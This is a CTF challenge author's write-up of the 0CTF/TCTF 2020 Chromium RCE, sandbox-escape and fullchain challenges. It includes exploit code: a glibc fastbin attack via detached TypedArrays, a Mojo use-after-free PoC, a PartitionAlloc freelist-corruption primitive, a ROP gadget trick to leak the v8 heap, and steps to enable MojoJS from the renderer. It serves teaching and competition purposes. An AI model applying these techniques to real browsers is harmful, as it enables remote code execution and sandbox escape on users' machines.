0CTF/TCTF 2020 Chromium series challenge

First of all, this is the first browser-related CTF challenge I have ever made. I was very glad to see players actively participating. In the end, 29 teams solved Chromium RCE, 7 teams solved Chromium SBX and 2 teams solved Chromium Fullchain; huge props to all those teams.

There are already several public write-ups and I have learned a lot from them. Nevertheless, I would like to provide a summary from my perspective and add more details.

Part Ⅰ: Chromium RCE

Heap exploitation has been the most popular category in recent years' CTFs. However, many players have already grown tired of it, so we prepared something different: glibc heap exploitation via JavaScript.

diff --git a/src/builtins/typed-array-set.tq b/src/builtins/typed-array-set.tq
index b5c9dcb261..babe7da3f0 100644
--- a/src/builtins/typed-array-set.tq
+++ b/src/builtins/typed-array-set.tq
@@ -70,7 +70,7 @@ TypedArrayPrototypeSet(
   // 7. Let targetBuffer be target.[[ViewedArrayBuffer]].
   // 8. If IsDetachedBuffer(targetBuffer) is true, throw a TypeError
   // exception.
-  const utarget = typed_array::EnsureAttached(target) otherwise IsDetached;
+  const utarget = %RawDownCast<AttachedJSTypedArray>(target);

   const overloadedArg = arguments[0];
   try {
@@ -86,8 +86,7 @@ TypedArrayPrototypeSet(
     // 10. Let srcBuffer be typedArray.[[ViewedArrayBuffer]].
     // 11. If IsDetachedBuffer(srcBuffer) is true, throw a TypeError
     // exception.
-    const utypedArray =
-        typed_array::EnsureAttached(typedArray) otherwise IsDetached;
+    const utypedArray = %RawDownCast<AttachedJSTypedArray>(typedArray);

     TypedArrayPrototypeSetTypedArray(
         utarget, utypedArray, targetOffset, targetOffsetOverflowed)

The bug is trivial. We removed two DETACH checks in %TypedArray%.prototype.set, which gives us a read/write primitive on a detached TypedArray. Besides, the ArrayBuffer heap is managed by glibc in the d8 binary, so the situation is very similar to a traditional CTF heap challenge with the four classic functions Alloc, Delete, Show and Edit, as follows:

// Alloc
let helper_ab = new ArrayBuffer(0x500);
let helper_ta = new Uint32Array(helper_ab);

let victim_ab = new ArrayBuffer(0x500);
let victim_ta = new Uint32Array(victim_ab);

// Delete
%ArrayBufferDetach(victim_ab);

// UAF Read/Show
helper_ta.set(victim_ta, 0);
console.log(helper_ta);

// UAF Write/Edit
helper_ta[0] = 0x41414141;
victim_ta.set(helper_ta, 0);

According to the writeups I received, most players used a fastbin attack to overwrite __malloc_hook with a one_gadget, while some other players found a way to trigger malloc instead of calloc, so the tcache attack works and makes it much easier.
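
To make that route concrete, here is a rough sketch of the fastbin variant for the challenge's d8 (run with --allow-natives-syntax). It assumes libc_base has already been leaked as a BigInt, e.g. by detaching a large buffer and reading the unsorted-bin pointers through another view, and MALLOC_HOOK_OFFSET / ONE_GADGET_OFFSET are placeholders for the target libc; the sizes and counts are illustrative, not taken from any particular solver's exploit.

// Sketch only: offsets and constants below are placeholders.
function fastbin_attack(libc_base /* BigInt */) {
  const fake_chunk = libc_base + MALLOC_HOOK_OFFSET - 0x23n;  // classic 0x7f size-byte trick

  // Fill the 0x70 tcache bin first so that later frees fall through to the fastbin
  // (calloc, which backs ArrayBuffer allocations here, does not take from tcache).
  for (let i = 0; i < 7; i++) %ArrayBufferDetach(new ArrayBuffer(0x68));

  let victim_ab = new ArrayBuffer(0x68);             // 0x70-sized chunk
  let victim_ta = new BigUint64Array(victim_ab);
  let helper_ta = new BigUint64Array(new ArrayBuffer(0x68));

  %ArrayBufferDetach(victim_ab);                     // free() -> 0x70 fastbin

  // Overwrite the freed chunk's fd with the fake chunk near __malloc_hook,
  // using the UAF write from the removed DETACH check.
  helper_ta[0] = fake_chunk;
  victim_ta.set(helper_ta, 0);

  new ArrayBuffer(0x68);                             // takes the real chunk back
  let hook_dv = new DataView(new ArrayBuffer(0x68)); // this one overlaps __malloc_hook
  hook_dv.setBigUint64(0x13, libc_base + ONE_GADGET_OFFSET, true);

  new ArrayBuffer(0x10);                             // the next allocation fires the hook
}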

To solve the challenge, players only need some basic knowledge of v8 (or to learn it), along with glibc heap tricks (also basic for a CTF player). So it was no surprise that it became the lowest-scoring challenge in the Pwn category, but I hope everyone had fun and learned something from it.

Part Ⅱ: Chromium SBX

Before we start, I would like to apologize for our dumb mistake, which initially made this challenge infeasible. We tweeted about it, and thanks again to @owodelta for pointing it out.

So the intended bug is the double-init, which is also a well-known bug pattern in the Chromium sandbox. Let's take a look at the patch after the fix:

// content/browser/tstorage/tstorage_impl.cc

void TStorageImpl::Init(InitCallback callback) {
  inner_db_ = std::make_unique<InnerDbImpl>();

  std::move(callback).Run();
}

void TStorageImpl::CreateInstance(CreateInstanceCallback callback) {
  mojo::PendingAssociatedRemote<blink::mojom::TInstance> pending_remote;
  auto instance = std::make_unique<TInstanceImpl>(inner_db_.get());
  instance_receivers_.Add(
      std::move(instance),
      pending_remote.InitWithNewEndpointAndPassReceiver());

  std::move(callback).Run(std::move(pending_remote));
}
// third_party/blink/public/mojom/tstorage/tstorage.mojom

interface TStorage {
  Init() => ();
  CreateInstance() => (pending_associated_remote<blink.mojom.TInstance>? instance);
};

(Therefore, as we expected, the only way to trigger the bug is to call TStorageImpl::Init twice. In that case, resetting the TStorage pointer is useless, since deleting it would also invalidate all TInstances.)

Bug analysis

The TStorage interface exposes two IPC calls. The first, Init, creates a new InnerDbImpl and binds the new database to inner_db_. The second, CreateInstance, creates a TInstanceImpl which takes the raw pointer of inner_db_ in its constructor, and sends it back to the renderer process.

Raw pointers are known to be dangerous in C++, and developers need to be very careful about their lifetime. In this challenge, the owner of the database is TStorageImpl::inner_db_, a std::unique_ptr to an InnerDbImpl. If we make a second call to Init, the previous inner_db_ is replaced by a new one and released immediately. As a result, the raw pointer to the previous inner_db_ held by TInstanceImpl becomes a dangling pointer, which leads to a UAF on InnerDbImpl.

Thus, the PoC would look like this:

// Create TStorage
let tstorage = new blink.mojom.TStoragePtr();
Mojo.bindInterface(blink.mojom.TStorage.name,
                   mojo.makeRequest(tstorage).handle, "context");

// First init
tstorage.init();

// Create TInstance
let instance = new blink.mojom.TInstanceAssociatedPtr(
    (await tstorage.createInstance()).instance);

// Second init
tstorage.init();

// trigger UAF
instance.getTotalSize();

TCMalloc

The next step is to reuse the memory of the freed inner_db_. According to the great research from markbrand, Blob looks perfect for our goal. However, as some of you might have noticed, the situation is not quite what you would expect: it is hard to get a blob to fill the hole left by inner_db_.

Actually, this is my second point in this challenge: TCMalloc. Chromium uses tcmalloc for its heap management. In the challenge, the vulnerable objects all live on the UI thread, while blobs are allocated and released on the IO thread, so they land in different ThreadCaches, and it can be very difficult to fill the hole from a different ThreadCache.

Let’s take a look at the official introduction:

TCMalloc assigns each thread a thread-local cache. Small allocations are satisfied from the thread-local cache. Objects are moved from central data structures into a thread-local cache as needed, and periodic garbage collections are used to migrate memory back from a thread-local cache into the central data structures.

In summary, most small heap operations stay within the thread, and each ThreadCache is unreachable from the others. However, chunks in the CentralCache can be moved to any ThreadCache, i.e. chunks in the CentralCache can be reused from any thread as needed.

There are at least two approaches to a reliable exploit. The first is to move the victim into the CentralCache, so that we can easily take it back out from another thread; the other is to find some usable allocations on the same thread. We will talk about the first one here and leave the second to you; it could be helpful in the bonus challenge :)

Looking at the references to ReleaseToCentralCache, there are several ways to achieve this migration. Let's take one path as an example.

inline ATTRIBUTE_ALWAYS_INLINE void ThreadCache::Deallocate(void* ptr, uint32 cl) {
  ASSERT(list_[cl].max_length() > 0);
  FreeList* list = &list_[cl];

  // This catches back-to-back frees of allocs in the same size
  // class. A more comprehensive (and expensive) test would be to walk
  // the entire freelist. But this might be enough to find some bugs.
  ASSERT(ptr != list->Next());

  uint32_t length = list->Push(ptr);

  if (PREDICT_FALSE(length > list->max_length())) {
    ListTooLong(list, cl);              <--------------------------------- [1]
    return;
  }

  size_ += list->object_size();
  if (PREDICT_FALSE(size_ > max_size_)) {  <------------------------------ [2]
    Scavenge();
  }
}

void ThreadCache::ListTooLong(FreeList* list, uint32 cl) {
  size_ += list->object_size();

  const int batch_size = Static::sizemap()->num_objects_to_move(cl);
  ReleaseToCentralCache(list, cl, batch_size);  <----------- victim is moved to CentralCache

  // If the list is too long, we need to transfer some number of
  // objects to the central cache. Ideally, we would transfer
  // num_objects_to_move, so the code below tries to make max_length
  // converge on num_objects_to_move.

  // ......
}

The above code snippet shows that, when the freelist gets too long, some number of objects are transferred to the central cache. So the solution is obvious: we only need to delete more databases after releasing the victim, so that the freelist of the cache fills up. As a result, the freed chunks, including our victim, will be moved to the CentralCache.
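
As a rough illustration in MojoJS (reusing the binding pattern from the PoC above; the count is arbitrary and ptr.ptr.reset() follows the legacy JS bindings, so treat this as a sketch rather than a drop-in): spray extra TStorage interfaces so that each owns an InnerDbImpl of the victim's size class, then tear them all down, so the burst of frees on the UI thread overflows the freelist and batches of chunks, eventually including our dangling InnerDbImpl, are released to the CentralCache.

// Sketch: flush the victim's size class from the UI ThreadCache to the CentralCache.
async function flush_to_central_cache(count = 0x80) {
  let storages = [];
  for (let i = 0; i < count; i++) {
    let ptr = new blink.mojom.TStoragePtr();
    Mojo.bindInterface(blink.mojom.TStorage.name,
                       mojo.makeRequest(ptr).handle, "context");
    await ptr.init();        // each Init() allocates one more InnerDbImpl
    storages.push(ptr);
  }
  // Dropping the pipes destroys the TStorageImpls and frees their InnerDbImpls,
  // pushing many same-size chunks onto the UI-thread freelist until ListTooLong()
  // (or Scavenge()) moves batches of them to the CentralCache.
  for (let ptr of storages)
    ptr.ptr.reset();
}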

(By the way, after a discussion with Tim Becker, we found that his writeup probably hits the other condition [2]: after the massive destruction, the total size of the ThreadCache exceeds max_size_, so it runs Scavenge and releases the objects to the CentralCache.)

Infoleak

Now things get more generic: find a way to leak information, then trigger the virtual call and do ROP. There are many public materials covering this part, so I won't go deep into it; however, I want to introduce a trick involving base::queue.

base::queue is a four-pointer-sized structure consisting of container, capacity, front and rear. If we leave everything zeroed, it will automatically initialize itself during the first push operation: it first allocates a container buffer for storing its elements, then stores the container pointer into itself. As a result, a heap pointer ends up inside the blob and we can easily leak it out. (More details can be found in my talks.)

before init:

      container          capacity
  - | 0x000000000000 | 0x000000000000 |
  - | 0x000000000000 | 0x000000000000 |
      front              rear

after first push:

      container          capacity
  - | 0x1f15101a3440 | 0x000000000004 |
  - | 0x000000000000 | 0x000000000001 |
      front              rear
        |
        +--> 0x1f15101a3440 (heap):
             - | arr[0] | hole | hole | hole |

In addition, I do recommend r3kapig’s writeup for further base::queue tricks.

Now that we have a heap address, we can spray heap pages, a technique first used by niklasb and ned. Or even better, we can use the queue itself to lay out the virtual table, since we are able to put arbitrary int64 values into it.

Finally, we trigger the virtual call, ROP our way through, and get the flag.

Part Ⅲ: Chromium Fullchain

Finally we come to the finale.

The vulnerabilities are almost the same as in the previous parts. It seems we only need a little effort to glue them together. But the truth is, as you will see, things become much more complicated.

ArrayBuffer Neuter

The first obstacle is that I removed the native API %ArrayBufferDetach (or ArrayBufferNeuter, as we called it some time ago) inside the sandbox, so we have to find a way to free the ArrayBuffer ourselves.

There is a well-known trick in browser security: JavaScript allows buffers to be transferred from a source thread to a Worker thread, and a transferred buffer is no longer accessible ("neutered") in the source thread. In Chrome, this also ends up releasing the backing store of the ArrayBuffer.

After some research and experiments, we ended up with the following snippet of code:

const ENABLE_NATIVE = 0;
function ArrayBufferDetach(ab) {
  if (ENABLE_NATIVE) {
    eval("%ArrayBufferDetach(ab);");
    return;
  }
  // Transferring the buffer to a worker detaches it in this context
  // and ends up releasing its backing store.
  let w = new Worker('');
  w.postMessage({ab: ab}, [ab]);
  w.terminate();
}

PartitionAlloc Bypass

Compared with the previous challenges, the most difficult part of the fullchain is heap exploitation. In Chromium RCE, d8 uses ptmalloc for heap management. However, when the Chrome browser takes over heap management, the allocator becomes PartitionAlloc. According to the official introduction, PartitionAlloc can be regarded as a kind of mitigation: it greatly hardens the security of the heap.

Around 2017, we (KeenLab) had several UAF bugs in the ArrayBuffer heap, and I tried to exploit them for the Pwn2Own contest. I successfully pwned some of them on 32-bit (the bugs were used for Mobile Pwn2Own, and mobile browsers were 32-bit), but at the time I had no idea how to pwn them on 64-bit. However, after making this challenge, I found it is not unbreakable.

Well, let's start our journey into PartitionAlloc. Like most heap allocators, PartitionAlloc also maintains a freelist. The next pointer is stored at the beginning of a freed chunk, encoded in big-endian. Let's take a look in the debugger.

let victim_ab = new ArrayBuffer(0x500);
let victim_ta = new Uint32Array(victim_ab);

// Delete
%ArrayBufferDetach(victim_ab);

Note: 0x205284e08000 is a freed chunk and the next freed chunk is 0x205284e08500.

It is almost the same as the tcache attack, except for the endianness. Since we have full control of the heap contents, this is not a problem, so just like the tcache attack, we are able to allocate at any address we want.

Thus, together with ArrayBufferDetach, we get an arb_alloc primitive.

async function arb_alloc(addr, size, ret = true) {
  let a_ab = new ArrayBuffer(size);
  let a_ta = new BigUint64Array(a_ab);
  let b_ab = new ArrayBuffer(size);
  let b_ta = new BigUint64Array(b_ab);
  // PartitionAlloc stores the freelist pointer in big-endian, hence `false`.
  new DataView(b_ab).setBigUint64(0, addr, false);
  await ArrayBufferDetach(a_ab);
  // UAF write: overwrite the freed slot's freelist pointer with `addr`.
  a_ta.set(b_ta, 0);
  a_ab = new ArrayBuffer(size);           // pops the real slot; addr becomes the new head
  if (ret) return new ArrayBuffer(size);  // this allocation lands at addr
}

The next question is where to allocate. Since we only have a heap address so far, let's see what's around it.

In fact, the heap address we leaked is in one of the SuperPages of PartitionAlloc. The layout of the SuperPage is as follows:

1
2
3
4
5
6
7
| Guard page (4KB) | Metadata page (4KB) | Guard pages (8KB) | Slot span | Slot span | ... | Slot span | Guard page (4KB) |

0x0000205284e00000 0x0000205284e01000 ---p // Guard page (4KB)
0x0000205284e01000 0x0000205284e02000 rw-p // Metadata page (4KB)
0x0000205284e02000 0x0000205284e04000 ---p // Guard pages (8KB)
0x0000205284e04000 0x0000205284e18000 rw-p // Slot span
0x0000205284e18000 0x0000205285000000 ---p // Unused slot spans + guard page

There are two writable regions in a SuperPage. The slot spans just hold data buffers, so the metadata page seems more interesting.

As you can see, we can find a Chrome address in the metadata page! To leak it, we can first allocate at the metadata page (e.g. 0x205284e01060), then create a new ArrayBuffer of a size whose bucket has not been used yet; this creates a new bucket and writes some useful metadata into the page we have already claimed.
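
Here is a minimal sketch of that idea, reusing arb_alloc from above; the 0x1060 offset into the metadata page, the scan window and the "fresh" bucket size are illustrative and depend on the build.

// Sketch: claim part of the metadata page, then let a brand-new bucket write its
// metadata (which contains pointers into Chrome's data segment) under our view.
async function leak_chrome_address(heap_addr /* BigInt */) {
  const superpage = heap_addr & ~0x1fffffn;   // SuperPages are 2MB-aligned
  const metadata  = superpage + 0x1060n;      // somewhere inside the metadata page

  let spy = new DataView(await arb_alloc(metadata, 0x100));

  // Use an allocation size whose bucket has not been touched yet: PartitionAlloc
  // initializes the corresponding PartitionPage metadata, including a pointer to
  // the bucket object living in Chrome's data segment.
  let trigger = new ArrayBuffer(0x3210);

  // Look for something that resembles a Chrome pointer in our window (heuristic).
  for (let off = 0; off < 0x100; off += 8) {
    let v = spy.getBigUint64(off, true);
    if (v > 0x500000000000n && v < 0x7f0000000000n) return v;
  }
  return 0n;
}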

After leaking a Chrome address, we are able to allocate into Chrome's global DATA segment. Our goal is to turn on the MojoJS flag for the sandbox bypass, which requires arbitrary read/write according to markbrand's exploit. My first thought was to leak the address of the v8 heap, so that we could take control of JS objects and do AAR/AAW as usual. However, our arb_alloc primitive has a weakness: it behaves more like calloc than malloc, meaning everything in the buffer is cleared before it is handed out.

Luckily, after reading the source code of PartitionAlloc, I found that, just like most memory allocators, it has some allocator hooks located in the global DATA segment, such as allocation_override_hook_ and free_override_hook_. Overwriting these hooks gives us the ability to control the $rip register and even do ROP with a stack pivot. True, that is enough to achieve code execution in the renderer process, but it is not good enough for the sandbox escape, because we must keep the process context valid. So the best way is still to find the heap address of v8.

Anyway, let’s see if there is anything useful when it crashes.

If you are familiar with v8, you have probably realized that $r10 points to a v8 object. However, $r13 is actually better for us in this case, because we can find the address of the v8 heap in $r13, but not in $r10.

Remember that we are in the hook of an allocation, so the return value of the function is the allocated buffer which will be handed back to JavaScript. In other words, if we can find a gadget that sets the return value to $r13 and does not destroy the context, we will get an ArrayBuffer whose data_ptr points to $r13.

The solution is shown in the diagram below. We first move $r13 into $rax, then pop the stack and return directly to frame #6.

#0  0x0000000041414141 in  () ; any gadget with this pattern
      push rax            ; for stack alignment
      mov rax, r13
      add rsp, 0x28 -----------------------------------------------------------+
      pop rbx                                                                   |
      pop r12                                                                   |
      pop r13                                                                   |
      pop r14                                                                   |
      pop r15                                                                   |
      pop rbp                                                                   |
      ret                                                                       |
#1  0x000055f8f5bac154 in base::PartitionRoot<true>::AllocFlags                 |
#2  0x000055f8f5bac154 in blink::ArrayBufferContents::AllocateMemoryWithFlags   |
#3  <libc++ wrong stack frame>                                                  |
#4  <libc++ wrong stack frame>                                                  |
#5  0x000055f8f0577562 in v8::internal::Heap::AllocateExternalBackingStore      |
      test rax, rax                                                             |
      je 0x55f8f0577576                                                         |
      add rsp, 0x8                                                              |
      pop rbx <------------------------------------------------------------------+
      pop r12
      pop r13
      pop r14
      pop r15
      pop rbp
      ret
#6  0x000055f8f0717fc0 in v8::internal::BackingStore::Allocate

Since this gadget pattern is very common in the binary, we can easily find one, at offset 0x6f81e30 in our challenge. More importantly, we skip the bzero operation of the original allocation path, so we can read everything out of the v8 heap through the returned buffer and finally leak the v8 heap address.
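
Putting that together, here is a hedged sketch of the leak step. ALLOC_HOOK_OFFSET is a placeholder for where the allocation hook lives in this build (depending on the build you may also need to flip the neighbouring "hooks enabled" flag), and the gadget offset is the one mentioned above.

// Sketch: point PartitionAlloc's allocation hook at the "mov rax, r13" gadget, then
// make one more ArrayBuffer allocation. The gadget unwinds straight back to
// BackingStore::Allocate with rax = r13, so the new buffer's data_ptr lands inside
// the v8 heap and we can simply read it out.
async function leak_v8_heap(chrome_base /* BigInt */) {
  const gadget = chrome_base + 0x6f81e30n;    // gadget offset in this build

  let hook = new DataView(await arb_alloc(chrome_base + ALLOC_HOOK_OFFSET, 0x20));
  hook.setBigUint64(0, gadget, true);         // install the fake hook

  // This allocation goes through the hook; the bzero of the normal path is skipped,
  // so the buffer exposes raw v8 heap memory.
  return new BigUint64Array(new ArrayBuffer(0x2000));
}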

If you are following v8, you probably know that Pointer Compression has landed since version 8.0. With pointer compression, the offsets of objects in the Old Space are fixed; since we have already leaked the base address, we can easily corrupt JavaScript objects via arb_alloc and finally turn this into addrof, read and write primitives.

After turning on the MojoJS flag via AAR/AAW, the last step is to refresh the webpage to enable the feature. However, since the JS context is going to be recreated, all objects are marked as dead and their memory must be reclaimed. It is difficult to avoid a segmentation fault when the garbage collector tries to reclaim the corrupted ArrayBuffer objects and works through the freelist.

This is one of the biggest difficulties in the challenge, but since we already have arbitrary R/W, we can patch the related functions to prevent the crash. In addition, there is a simpler way: overwrite free_hook_ with an empty function, so the free operation does not actually take effect. This perfectly avoids crashes during garbage collection, since nothing actually happens.

Moreover, after reading ohjin's exploit, I learned there is another flag, blink::RuntimeEnabledFeatures::is_mojo_js_enabled_, located in the global data segment, which can be used to turn MojoJS on as well. This makes things much easier: we only need to use arb_alloc to overwrite the is_mojo_js_enabled_ flag and free_hook_, and the door to the next stage opens.

In summary, with no need for AAR/AAW, the steps of the PartitionAlloc attack could be (a rough sketch follows the list):

  1. leak the heap address
  2. allocate into the metadata page and leak the Chrome address
  3. allocate at free_hook_ and overwrite it with an empty function (a single \xc3, i.e. ret)
  4. allocate at is_mojo_js_enabled_ and overwrite it with 1
  5. window.location.reload()
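
A rough outline of those steps follows, with the same caveats as before: FREE_HOOK_OFFSET, MOJO_JS_FLAG_OFFSET, RET_GADGET_OFFSET and LEAKED_PTR_OFFSET are placeholders for this particular build, and arb_alloc / leak_chrome_address are the sketches from earlier in this post.

// Sketch of the whole PartitionAlloc stage; helpers are the ones defined above.
async function enable_mojo_js(heap_addr /* BigInt, read from a freed slot's freelist pointer */) {
  // 1-2. leak a Chrome pointer via the SuperPage metadata page
  let leaked      = await leak_chrome_address(heap_addr);
  let chrome_base = leaked - LEAKED_PTR_OFFSET;

  // 3. neutralize free(): point the free hook at a bare ret (0xc3) so the GC
  //    triggered by the reload never really releases our corrupted buffers
  let hook = new DataView(await arb_alloc(chrome_base + FREE_HOOK_OFFSET, 0x20));
  hook.setBigUint64(0, chrome_base + RET_GADGET_OFFSET, true);

  // 4. flip blink::RuntimeEnabledFeatures::is_mojo_js_enabled_
  let flag = new DataView(await arb_alloc(chrome_base + MOJO_JS_FLAG_OFFSET, 0x20));
  flag.setUint8(0, 1);

  // 5. reload: the fresh JS context now gets the MojoJS bindings
  window.location.reload();
}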

After the refresh, everything is exactly the same as in Part Ⅱ. Cheers!

By the way, after the game I learned from @owodelta that there was an in-the-wild exploit against PartitionAlloc last month, which seems really cool! That approach is also used by @owodelta in his writeup of the fullchain, MUST SEE!!!

Part Ⅳ: Chromium Fullchain++

As I mentioned above, I prepared a bonus challenge. Notice that I left a message in the patch.

+// NOTE: On Windows platform, binary and library address of chrome main process is same
+// as renderer process, so we suppose you already have these addresses in SBX challenge.
+// In fact, even without these two functions, you can also solve this problem, but I don't
+// think it's friendly to players in a 48-hour game. Maybe you can try it after the match :)
+void TStorageImpl::GetLibcAddress(GetLibcAddressCallback callback) {
+  std::move(callback).Run((uint64_t)(&atoi));
+}
+void TStorageImpl::GetTextAddress(GetTextAddressCallback callback) {
+  std::move(callback).Run((uint64_t)(&TStorageImpl::Create));
+}

As you can see, the first part of the bonus is: how do you exploit it without these two backdoors? If you manage to do that, try the second one: what about CFI being enabled? CFI prevents all indirect-call hijacking. The mitigation has already been deployed in the official Linux and ChromeOS builds, and I believe this is the trend.

The solutions to these two add-ons depend on the design of the challenge, so they might not be very general, but I'm pretty sure you can learn something from them. When you solve the bonus challenge, please let me know; I will mail some gifts to the first 3 winners, maybe T-shirts or something like that :) Also, I will release my exploit after 3 solves.

Chromium Fullchain++

Try to solve the fullchain again with CFI enabled.
If you manage to execute ./flag_printer, please send me the exploit and I’ll check it locally. My email address is in the attachment.

Note: since no one else has checked the challenge, there might be some mistakes. Please contact me if you find anything wrong.

Attachment here

Top players of Chromium Fullchain++

  1. 🏅typeconfuser

Reference

Public Writeups:

Great Research (from chrome-sbx-db)

Credit